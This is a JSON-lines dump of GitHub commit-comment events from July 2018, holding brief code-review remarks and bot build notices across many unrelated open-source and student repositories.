{"id":"8028906618","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29859219,"position":142,"line":3040,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"497f2623c1e4995dd023411b6253f18c2dfd698d","created_at":"2018-07-27T14:24:25Z","updated_at":"2018-07-27T14:24:25Z","author_association":"COLLABORATOR","body":"Rabb'e? Also definitely `LR` here and `Dir/RL ! Use/MT` in tur."}},"created_at":"2018-07-27T14:24:25Z"}
{"id":"8028938394","type":"CommitCommentEvent","actor":{"login":"CrayT"},"repo":{"name":"CrayT/my-code"},"payload":{"comment":{"id":29859309,"position":null,"line":null,"path":null,"commit_id":"3d32beb951413d2f62ac8a297ce9aaf124df79f4","created_at":"2018-07-27T14:30:04Z","updated_at":"2018-07-27T14:30:04Z","author_association":"OWNER","body":"魏老师项目"}},"created_at":"2018-07-27T14:30:04Z"}
{"id":"8028940260","type":"CommitCommentEvent","actor":{"login":"pmusolino"},"repo":{"name":"pmusolino/Wormholy"},"payload":{"comment":{"id":29859318,"position":null,"line":null,"path":null,"commit_id":"c02af3316c2ad2fa8991a50361ca0a867980cd13","created_at":"2018-07-27T14:30:23Z","updated_at":"2018-07-27T14:30:23Z","author_association":"OWNER","body":"I believe both approaches are correct, but I also believe that the Wormholy was born mainly for the purpose of being imported to work as it is.\r\n\r\nI received several messages from people who updated the library, and they could not make it work anymore, because they expect it to work without integration, without environment variables or something else.\r\n\r\nTherefore, I believe that we should maintain the behavior that people expect, and give more freedom to disable the shake."}},"created_at":"2018-07-27T14:30:23Z"}
{"id":"8028945819","type":"CommitCommentEvent","actor":{"login":"mitunayon"},"repo":{"name":"mitunayon/rewindgame2018"},"payload":{"comment":{"id":29859332,"position":null,"line":null,"path":null,"commit_id":"e4105dcb27a7c91cb45c39b0e044554c6ed52f83","created_at":"2018-07-27T14:31:20Z","updated_at":"2018-07-27T14:31:20Z","author_association":"OWNER","body":"Cool. With these new imports I did not get any .meta files as like the other imports from yesterday,"}},"created_at":"2018-07-27T14:31:20Z"}
{"id":"8028949858","type":"CommitCommentEvent","actor":{"login":"fepegar"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29859347,"position":5,"line":98,"path":"Modules/Loadable/Segmentations/Logic/vtkSlicerSegmentationGeometryLogic.h","commit_id":"673acf9fc06298c7100ee5947fc207e67a17bbea","created_at":"2018-07-27T14:32:03Z","updated_at":"2018-07-27T14:32:03Z","author_association":"NONE","body":"I noticed that I commented the comments instead of the tooltip after Andrey posted his response. I assumed you would modify both. Anyway, just trying to help."}},"created_at":"2018-07-27T14:32:03Z"}
{"id":"8028951876","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859350,"position":16,"line":43,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:32:25Z","updated_at":"2018-07-27T14:32:25Z","author_association":"MEMBER","body":"You actually don't need either of these resolvers. You can put them in the `only_fields` tuple. And make sure that you add docs to these fields!"}},"created_at":"2018-07-27T14:32:25Z"}
{"id":"8028954263","type":"CommitCommentEvent","actor":{"login":"egzonqj"},"repo":{"name":"kwsch/PKHeX"},"payload":{"comment":{"id":29859355,"position":120,"line":567,"path":"PKHeX.Core/Resources/text/es/lang_es.txt","commit_id":"9cfffd30e7e3bb04bbfff017976e5cb9226b145e","created_at":"2018-07-27T14:32:52Z","updated_at":"2018-07-27T14:32:52Z","author_association":"CONTRIBUTOR","body":"This is actually Sala Batalla [as shown here](https://www.wikidex.net/wiki/Frente_Batalla_(cuarta_generaci%C3%B3n)) [or here](https://www.wikidex.net/wiki/Frente_Batalla_(cuarta_generaci%C3%B3n))"}},"created_at":"2018-07-27T14:32:52Z"}
{"id":"8028955142","type":"CommitCommentEvent","actor":{"login":"julianfraiese"},"repo":{"name":"bitcoin-dot-org/bitcoin.org"},"payload":{"comment":{"id":29859357,"position":null,"line":null,"path":null,"commit_id":"6cdfae3ddf4a05a4f7e77c1be6cbee87d43fd967","created_at":"2018-07-27T14:33:01Z","updated_at":"2018-07-27T14:33:01Z","author_association":"NONE","body":"@wbnns Will, order swapped. It's weird, I thought that I committed with the right order and you have just noted it too. Anyway, all set. Let me know if something else arouses. Thanks."}},"created_at":"2018-07-27T14:33:01Z"}
{"id":"8028955499","type":"CommitCommentEvent","actor":{"login":"CorentinLimier"},"repo":{"name":"CorentinLimier/datashare"},"payload":{"comment":{"id":29859358,"position":4,"line":4,"path":"index.js","commit_id":"10ceace2123ffb0eb81aa70293b09614d9193291","created_at":"2018-07-27T14:33:05Z","updated_at":"2018-07-27T14:33:05Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-27T14:33:05Z"}
{"id":"8028956133","type":"CommitCommentEvent","actor":{"login":"mhobotpplnet"},"repo":{"name":"ewbankkit/kiam"},"payload":{"comment":{"id":29859361,"position":null,"line":null,"path":null,"commit_id":"f1ecf21c8120e1643ffeb140eb4317935535225a","created_at":"2018-07-27T14:33:12Z","updated_at":"2018-07-27T14:33:12Z","author_association":"NONE","body":"Yeah I noticed it wayy to late hahha."}},"created_at":"2018-07-27T14:33:12Z"}
{"id":"8028959578","type":"CommitCommentEvent","actor":{"login":"wdcurry"},"repo":{"name":"nmdias/DefaultsKit"},"payload":{"comment":{"id":29859372,"position":null,"line":null,"path":null,"commit_id":"aad6f01ef84d01d8e10c4b15b2c3bb46711b3d75","created_at":"2018-07-27T14:33:50Z","updated_at":"2018-07-27T14:33:50Z","author_association":"NONE","body":"just a reminder: somehow the bump is not hitting regular \"pod install\" .. still getting 0.0.8 .... just tested."}},"created_at":"2018-07-27T14:33:50Z"}
{"id":"8028961024","type":"CommitCommentEvent","actor":{"login":"mitunayon"},"repo":{"name":"mitunayon/rewindgame2018"},"payload":{"comment":{"id":29859375,"position":null,"line":null,"path":null,"commit_id":"e4105dcb27a7c91cb45c39b0e044554c6ed52f83","created_at":"2018-07-27T14:34:07Z","updated_at":"2018-07-27T14:34:07Z","author_association":"OWNER","body":"My guess is , when the models are imported, we should save project in Unity, it will save your generated .meta files and you can push them as usual.\r\n\r\n I think the problem that we were having was when the assets were moved to the folder but no .metas were generated for them, leading to each of our unitys to generate metas when we open them for the first time."}},"created_at":"2018-07-27T14:34:07Z"}
{"id":"8028963593","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29859384,"position":null,"line":null,"path":null,"commit_id":"9be523493c4b59aba8e09b2e8d0c6b5c74f29899","created_at":"2018-07-27T14:34:35Z","updated_at":"2018-07-27T14:34:35Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (3324 of 3324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9be523493c4b59aba8e09b2e8d0c6b5c74f29899-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T14:34:35Z"}
{"id":"8028965496","type":"CommitCommentEvent","actor":{"login":"cpinter"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29859393,"position":5,"line":98,"path":"Modules/Loadable/Segmentations/Logic/vtkSlicerSegmentationGeometryLogic.h","commit_id":"673acf9fc06298c7100ee5947fc207e67a17bbea","created_at":"2018-07-27T14:34:56Z","updated_at":"2018-07-27T14:34:56Z","author_association":"CONTRIBUTOR","body":"Thanks for helping :) However I can only fix what people bring to my attention. I'm not a wizard :)"}},"created_at":"2018-07-27T14:34:56Z"}
{"id":"8028967439","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859400,"position":21,"line":122,"path":"assembl/models/action.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:35:18Z","updated_at":"2018-07-27T14:35:18Z","author_association":"MEMBER","body":"Hmm, thinking about it more, I suggest the following:\r\nRename all of these non-tabled `Actions` to the following templte: `discussion:type:accept|reject`\r\neg.\r\n`discussion.privacypolicy:accept`\r\n\r\nIt would make searching on types much easier later."}},"created_at":"2018-07-27T14:35:18Z"}
{"id":"8028967595","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29859402,"position":4,"line":25,"path":"pkgs/top-level/all-packages.nix","commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-27T14:35:20Z","updated_at":"2018-07-27T14:35:20Z","author_association":"MEMBER","body":"Yeah. Maybe even immediately."}},"created_at":"2018-07-27T14:35:20Z"}
{"id":"8028969393","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29859406,"position":null,"line":null,"path":null,"commit_id":"a86a325827681366d80e6707a70126e7fb3d9381","created_at":"2018-07-27T14:35:38Z","updated_at":"2018-07-27T14:35:38Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3736delete](https://3736delete-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/delete-site](https://3736delete-static-docs.pantheonsite.io/docs/delete-site)\n"}},"created_at":"2018-07-27T14:35:38Z"}
{"id":"8028970301","type":"CommitCommentEvent","actor":{"login":"bzaczynski"},"repo":{"name":"bzaczynski/warsztat-samochodowy"},"payload":{"comment":{"id":29859409,"position":1,"line":1,"path":"README.md","commit_id":"739da97467860200f659fd73dd752417a5a7c6bd","created_at":"2018-07-27T14:35:48Z","updated_at":"2018-07-27T14:35:48Z","author_association":"OWNER","body":"Weź to chłopie zmień!"}},"created_at":"2018-07-27T14:35:48Z"}
{"id":"8028970962","type":"CommitCommentEvent","actor":{"login":"kseo"},"repo":{"name":"CodeChain-io/codechain"},"payload":{"comment":{"id":29859414,"position":48,"line":348,"path":"codechain/main.rs","commit_id":"343dbad18c13841397126b5b4de78bfefd0be369","created_at":"2018-07-27T14:35:54Z","updated_at":"2018-07-27T14:35:54Z","author_association":"CONTRIBUTOR","body":"The style is not consistent with other parts of code. First check if `config.shard_validator.disable` is false and invoke `new_shard_validator` conditionally only when it is not disabled. `new_shard_validator` should take `ShardValidatorConfig` instead of `Option< ShardValidatorConfig>`.\r\n\r\nIf you prefer this style, do the refactoring all at once in a later patch."}},"created_at":"2018-07-27T14:35:54Z"}
{"id":"8028976774","type":"CommitCommentEvent","actor":{"login":"edasque"},"repo":{"name":"edasque/DynamoDBtoCSV"},"payload":{"comment":{"id":29859427,"position":null,"line":null,"path":null,"commit_id":"3afcb35b554f8f8abe75d77ffde5e8d70d95790b","created_at":"2018-07-27T14:36:56Z","updated_at":"2018-07-27T14:36:56Z","author_association":"OWNER","body":"@smolse because as stated, I currently have no way to test these. I no longer have DynamoDB so I am relying on the community. I have asked AWS to provide me with a test environment where I could have a large-fish table but it hasn't happened."}},"created_at":"2018-07-27T14:36:56Z"}
{"id":"8028977002","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859428,"position":19,"line":777,"path":"assembl/models/auth.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:36:59Z","updated_at":"2018-07-27T14:36:59Z","author_association":"MEMBER","body":"forgot the add `@user_last_rejected_cgu_date.setter` here."}},"created_at":"2018-07-27T14:36:59Z"}
{"id":"8028978157","type":"CommitCommentEvent","actor":{"login":"Franki94"},"repo":{"name":"Franki94/Belatrix_Clean_Code"},"payload":{"comment":{"id":29859431,"position":8,"line":10,"path":"SOLID/01 SingleResponsability/Sample.cs","commit_id":"ec72c2cd4c909198e025167e39102b8677f7be1c","created_at":"2018-07-27T14:37:12Z","updated_at":"2018-07-27T14:37:12Z","author_association":"OWNER","body":"Yes, I was thinking Sum method not must send a message just must Sum"}},"created_at":"2018-07-27T14:37:12Z"}
{"id":"8028978368","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859432,"position":26,"line":784,"path":"assembl/models/auth.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:37:13Z","updated_at":"2018-07-27T14:37:13Z","author_association":"MEMBER","body":"Forgot to add setter here as well."}},"created_at":"2018-07-27T14:37:13Z"}
{"id":"8028980904","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859438,"position":19,"line":777,"path":"assembl/models/auth.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:37:41Z","updated_at":"2018-07-27T14:37:41Z","author_association":"MEMBER","body":"And rename the function to `user_last_rejected_cgu_date`"}},"created_at":"2018-07-27T14:37:41Z"}
{"id":"8028984081","type":"CommitCommentEvent","actor":{"login":"pjotrp"},"repo":{"name":"brainstorm/sambamba"},"payload":{"comment":{"id":29859442,"position":null,"line":null,"path":null,"commit_id":"d3b21a57516ac502978c03d882075d3bcb11aa31","created_at":"2018-07-27T14:38:14Z","updated_at":"2018-07-27T14:38:14Z","author_association":"NONE","body":"@brainstorm I have started work on this."}},"created_at":"2018-07-27T14:38:14Z"}
{"id":"8028986896","type":"CommitCommentEvent","actor":{"login":"adrianodennanni"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29859450,"position":10,"line":10,"path":"app/views/tweets/show.html.erb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T14:38:43Z","updated_at":"2018-07-27T14:38:43Z","author_association":"NONE","body":"No momento, esta tag não está sendo renderizada.\r\nA tag <% %> apenas processa o conteúdo dentro dela.\r\nA tag <%= %> processa o conteúdo e injeta an página o resultado.\r\n\r\nResumindo, falta colocar um = na tag"}},"created_at":"2018-07-27T14:38:43Z"}
{"id":"8028991653","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859460,"position":45,"line":297,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:39:33Z","updated_at":"2018-07-27T14:39:33Z","author_association":"MEMBER","body":"Use `args.get('action')` to be consistent with the code written just 2 lines above."}},"created_at":"2018-07-27T14:39:33Z"}
{"id":"8028997397","type":"CommitCommentEvent","actor":{"login":"adrianodennanni"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29859480,"position":43,"line":43,"path":"app/controllers/tweets_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T14:40:35Z","updated_at":"2018-07-27T14:40:35Z","author_association":"NONE","body":"Assim como no caso anterior do delete, um usuário pode editar o conteúdo do tweet de outro usuário."}},"created_at":"2018-07-27T14:40:35Z"}
{"id":"8028998932","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29859484,"position":null,"line":null,"path":null,"commit_id":"17ccc263ea2cc335f0ae13a62cf85c53f0e8b24d","created_at":"2018-07-27T14:40:51Z","updated_at":"2018-07-27T14:40:51Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpress4](https://wordpress4-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/caching-advanced-topics](https://wordpress4-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n"}},"created_at":"2018-07-27T14:40:51Z"}
{"id":"8029001573","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29859489,"position":null,"line":null,"path":null,"commit_id":"0cd31e635da7d044fc73e7c307aa38023e994b87","created_at":"2018-07-27T14:41:20Z","updated_at":"2018-07-27T14:41:20Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-66](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-66).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-66-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T14:41:20Z"}
{"id":"8029002780","type":"CommitCommentEvent","actor":{"login":"adrianodennanni"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29859492,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T14:41:33Z","updated_at":"2018-07-27T14:41:33Z","author_association":"NONE","body":"Vou propor um desafio: você conseguiria implementar uma feature que impede um usuário de postar um tweet com mais de 280 caracteres?"}},"created_at":"2018-07-27T14:41:33Z"}
{"id":"8029004646","type":"CommitCommentEvent","actor":{"login":"lukeeey"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29859497,"position":null,"line":null,"path":null,"commit_id":"f3cf64c2cf24a9a7b99301e4f8091c315423e05d","created_at":"2018-07-27T14:41:52Z","updated_at":"2018-07-27T14:41:52Z","author_association":"NONE","body":"No please give me exploits so i can exploit them"}},"created_at":"2018-07-27T14:41:52Z"}
{"id":"8029006225","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/EthereumChallenge"},"payload":{"comment":{"id":29859499,"position":6,"line":6,"path":"Suicider.sol","commit_id":"8110e0523591c54a916ceb309297ab7075ff2903","created_at":"2018-07-27T14:42:09Z","updated_at":"2018-07-27T14:42:09Z","author_association":"NONE","body":"You can be even more succinct by moving this into the constructor."}},"created_at":"2018-07-27T14:42:09Z"}
{"id":"8029006955","type":"CommitCommentEvent","actor":{"login":"adrianodennanni"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29859505,"position":null,"line":null,"path":null,"commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T14:42:16Z","updated_at":"2018-07-27T14:42:16Z","author_association":"NONE","body":"Ah, seria legal se um usuário pudesse ver em todas as páginas do twitter sua foto e username, de preferência em algum canto superior."}},"created_at":"2018-07-27T14:42:16Z"}
{"id":"8029011229","type":"CommitCommentEvent","actor":{"login":"orimsyomi"},"repo":{"name":"zulieh/foodhub"},"payload":{"comment":{"id":29859516,"position":null,"line":null,"path":null,"commit_id":"e3a59e9df0393442eb79d60bbe9f58677da5ff8b","created_at":"2018-07-27T14:43:03Z","updated_at":"2018-07-27T14:43:03Z","author_association":"COLLABORATOR","body":"Hey @zulieh pls take a look at the change. when you have pics of a specific dimension it would work better"}},"created_at":"2018-07-27T14:43:03Z"}
{"id":"8029011236","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/EthereumChallenge"},"payload":{"comment":{"id":29859517,"position":23,"line":23,"path":"Attacker.sol","commit_id":"13acf06cbd1d15efbc73737aba450d10fb48ada0","created_at":"2018-07-27T14:43:03Z","updated_at":"2018-07-27T14:43:03Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-27T14:43:03Z"}
{"id":"8029013212","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859522,"position":33,"line":285,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:43:25Z","updated_at":"2018-07-27T14:43:25Z","author_association":"MEMBER","body":"You don't need the ID in the API. You cannot update the cookies of other users. So remove this requirement. Only the action is required."}},"created_at":"2018-07-27T14:43:25Z"}
{"id":"8029013317","type":"CommitCommentEvent","actor":{"login":"JCobbles"},"repo":{"name":"ocadotechnology/aimmo"},"payload":{"comment":{"id":29859523,"position":null,"line":null,"path":null,"commit_id":"aae19bf927bb1cabf3e18b5eb6eecf69f1c305f5","created_at":"2018-07-27T14:43:26Z","updated_at":"2018-07-27T14:43:26Z","author_association":"CONTRIBUTOR","body":"wow huge"}},"created_at":"2018-07-27T14:43:26Z"}
{"id":"8029015015","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/EthereumChallenge"},"payload":{"comment":{"id":29859530,"position":20,"line":20,"path":"Attacker.sol","commit_id":"13acf06cbd1d15efbc73737aba450d10fb48ada0","created_at":"2018-07-27T14:43:44Z","updated_at":"2018-07-27T14:43:44Z","author_association":"NONE","body":"If your suicider suicides in the constructor, you can avoid its deployment on line 9."}},"created_at":"2018-07-27T14:43:44Z"}
{"id":"8029018022","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/EthereumChallenge"},"payload":{"comment":{"id":29859538,"position":20,"line":20,"path":"Attacker.sol","commit_id":"13acf06cbd1d15efbc73737aba450d10fb48ada0","created_at":"2018-07-27T14:44:14Z","updated_at":"2018-07-27T14:44:14Z","author_association":"NONE","body":"Plus, you could have this Attacker actually deploy the suicider."}},"created_at":"2018-07-27T14:44:14Z"}
{"id":"8029018581","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859539,"position":46,"line":298,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:44:19Z","updated_at":"2018-07-27T14:44:19Z","author_association":"MEMBER","body":"You don't use the `id_` at all. You get the `request.authenticated_userid` or you `HTTPUnauthorized` out. Only the logged in user can set their own acceptances, after all :)"}},"created_at":"2018-07-27T14:44:19Z"}
{"id":"8029020921","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29859543,"position":null,"line":null,"path":null,"commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-27T14:44:44Z","updated_at":"2018-07-27T14:44:44Z","author_association":"CONTRIBUTOR","body":"Well, sounds like Buildroot has found a much simpler way than Exherbo to deal with this libgcc stuff then, given they don't seem to need any of this 200 lines of code for building libgcc. We should be looking what they do.\r\n\r\nWhy do we (or Exherbo for that matter) need to care about libgcc specifics that much anyway? Isn't it pretty much an implementation detail of GCC that it will need for some specific code generation patterns on only some targets. An unwrapped Nix-built gcc seems to already know its location just fine (the path printed `gcc -print-libgcc-file-name` exists on a native gcc)."}},"created_at":"2018-07-27T14:44:44Z"}
{"id":"8029021555","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/EthereumChallenge"},"payload":{"comment":{"id":29859545,"position":28,"line":28,"path":"Attacker.sol","commit_id":"13acf06cbd1d15efbc73737aba450d10fb48ada0","created_at":"2018-07-27T14:44:50Z","updated_at":"2018-07-27T14:44:50Z","author_association":"NONE","body":"Why not `msg.sender.transfer(msg.value);` after line 23."}},"created_at":"2018-07-27T14:44:50Z"}
{"id":"8029022441","type":"CommitCommentEvent","actor":{"login":"EdwardTejada9312"},"repo":{"name":"saineshwar/ASP.NET-CORE-MVC-Project-Event-Management"},"payload":{"comment":{"id":29859550,"position":null,"line":null,"path":null,"commit_id":"1dfeec33215401383151251f4da889ea29888da3","created_at":"2018-07-27T14:44:58Z","updated_at":"2018-07-27T14:44:58Z","author_association":"NONE","body":"Where is the script to build the database?"}},"created_at":"2018-07-27T14:44:58Z"}
{"id":"8029022452","type":"CommitCommentEvent","actor":{"login":"timball"},"repo":{"name":"equalitie/ouinet"},"payload":{"comment":{"id":29859551,"position":null,"line":null,"path":null,"commit_id":"e44ed34dc15fa1b99c59cde88d813c58f1c4dd36","created_at":"2018-07-27T14:44:58Z","updated_at":"2018-07-27T14:44:58Z","author_association":"CONTRIBUTOR","body":"we needed a license so i added it."}},"created_at":"2018-07-27T14:44:58Z"}
{"id":"8029022554","type":"CommitCommentEvent","actor":{"login":"JCobbles"},"repo":{"name":"ocadotechnology/aimmo"},"payload":{"comment":{"id":29859552,"position":null,"line":null,"path":null,"commit_id":"aae19bf927bb1cabf3e18b5eb6eecf69f1c305f5","created_at":"2018-07-27T14:44:59Z","updated_at":"2018-07-27T14:44:59Z","author_association":"CONTRIBUTOR","body":"thanks @NiallEgan "}},"created_at":"2018-07-27T14:44:59Z"}
{"id":"8029025425","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"maxxruss/yii2"},"payload":{"comment":{"id":29859561,"position":7,"line":63,"path":"controllers/EventController.php","commit_id":"9c20939fafa17d79e281843e86ab4ef82e77ed04","created_at":"2018-07-27T14:45:30Z","updated_at":"2018-07-27T14:45:30Z","author_association":"NONE","body":"для рендера json есть отличный метод $this->asJson($model->getAttributes())"}},"created_at":"2018-07-27T14:45:30Z"}
{"id":"8029026593","type":"CommitCommentEvent","actor":{"login":"neilisaac"},"repo":{"name":"sulfurheron/cpp-logfmt"},"payload":{"comment":{"id":29859564,"position":5,"line":29,"path":"README.md","commit_id":"4835746ce88770ffcac76bb447ca45de561e75b3","created_at":"2018-07-27T14:45:42Z","updated_at":"2018-07-27T14:45:42Z","author_association":"NONE","body":"seems like an awkward API: what if you want a new logger that is in the same module? "}},"created_at":"2018-07-27T14:45:42Z"}
{"id":"8029026984","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/EthereumChallenge"},"payload":{"comment":{"id":29859569,"position":10,"line":10,"path":"Attacker.sol","commit_id":"13acf06cbd1d15efbc73737aba450d10fb48ada0","created_at":"2018-07-27T14:45:46Z","updated_at":"2018-07-27T14:45:46Z","author_association":"NONE","body":"Why not pass the address as part of `attack(` and not save that on storage?"}},"created_at":"2018-07-27T14:45:46Z"}
{"id":"8029027181","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29859570,"position":50,"line":302,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T14:45:48Z","updated_at":"2018-07-27T14:45:48Z","author_association":"MEMBER","body":"This line here will throw `HTTPUnauthorized` exception if the user is not connected. "}},"created_at":"2018-07-27T14:45:48Z"}
{"id":"8029027555","type":"CommitCommentEvent","actor":{"login":"neilisaac"},"repo":{"name":"sulfurheron/cpp-logfmt"},"payload":{"comment":{"id":29859571,"position":8,"line":20,"path":"kin_logfmt/include/kin_logfmt.h","commit_id":"4835746ce88770ffcac76bb447ca45de561e75b3","created_at":"2018-07-27T14:45:51Z","updated_at":"2018-07-27T14:45:51Z","author_association":"NONE","body":"so new loggers are never freed?"}},"created_at":"2018-07-27T14:45:51Z"}
{"id":"8029029462","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/Kvr"},"payload":{"comment":{"id":29859572,"position":1,"line":1,"path":"Blog/view/adminhtml/ui_component/blog_post_listing.xml","commit_id":"1cdca2611012fb31f4619c462725a31f0948d385","created_at":"2018-07-27T14:46:11Z","updated_at":"2018-07-27T14:46:11Z","author_association":"OWNER","body":"Magento will look at the Listing Node."}},"created_at":"2018-07-27T14:46:11Z"}
{"id":"8029031467","type":"CommitCommentEvent","actor":{"login":"neilisaac"},"repo":{"name":"sulfurheron/cpp-logfmt"},"payload":{"comment":{"id":29859575,"position":8,"line":20,"path":"kin_logfmt/include/kin_logfmt.h","commit_id":"4835746ce88770ffcac76bb447ca45de561e75b3","created_at":"2018-07-27T14:46:30Z","updated_at":"2018-07-27T14:46:30Z","author_association":"NONE","body":"This seems backwards; shouldn't a reference to the parent logger be kept on the child?"}},"created_at":"2018-07-27T14:46:30Z"}
{"id":"8029031915","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29859576,"position":null,"line":null,"path":null,"commit_id":"0af9cc441376e6a216e15efdd84ad729d46b6e59","created_at":"2018-07-27T14:46:35Z","updated_at":"2018-07-27T14:46:35Z","author_association":"MEMBER","body":"What is the problem?\r\nNothing changed in artools."}},"created_at":"2018-07-27T14:46:35Z"}
{"id":"8029032090","type":"CommitCommentEvent","actor":{"login":"ajtudela"},"repo":{"name":"kwsch/PKHeX"},"payload":{"comment":{"id":29859577,"position":54,"line":45,"path":"PKHeX.Core/Resources/text/es/lang_es.txt","commit_id":"9cfffd30e7e3bb04bbfff017976e5cb9226b145e","created_at":"2018-07-27T14:46:37Z","updated_at":"2018-07-27T14:46:37Z","author_association":"CONTRIBUTOR","body":"Vale, sí cierto, el subsuelo era de la 4º generación!"}},"created_at":"2018-07-27T14:46:37Z"}
{"id":"8029032734","type":"CommitCommentEvent","actor":{"login":"ajtudela"},"repo":{"name":"kwsch/PKHeX"},"payload":{"comment":{"id":29859581,"position":120,"line":567,"path":"PKHeX.Core/Resources/text/es/lang_es.txt","commit_id":"9cfffd30e7e3bb04bbfff017976e5cb9226b145e","created_at":"2018-07-27T14:46:44Z","updated_at":"2018-07-27T14:46:44Z","author_association":"CONTRIBUTOR","body":"Arreglado"}},"created_at":"2018-07-27T14:46:44Z"}
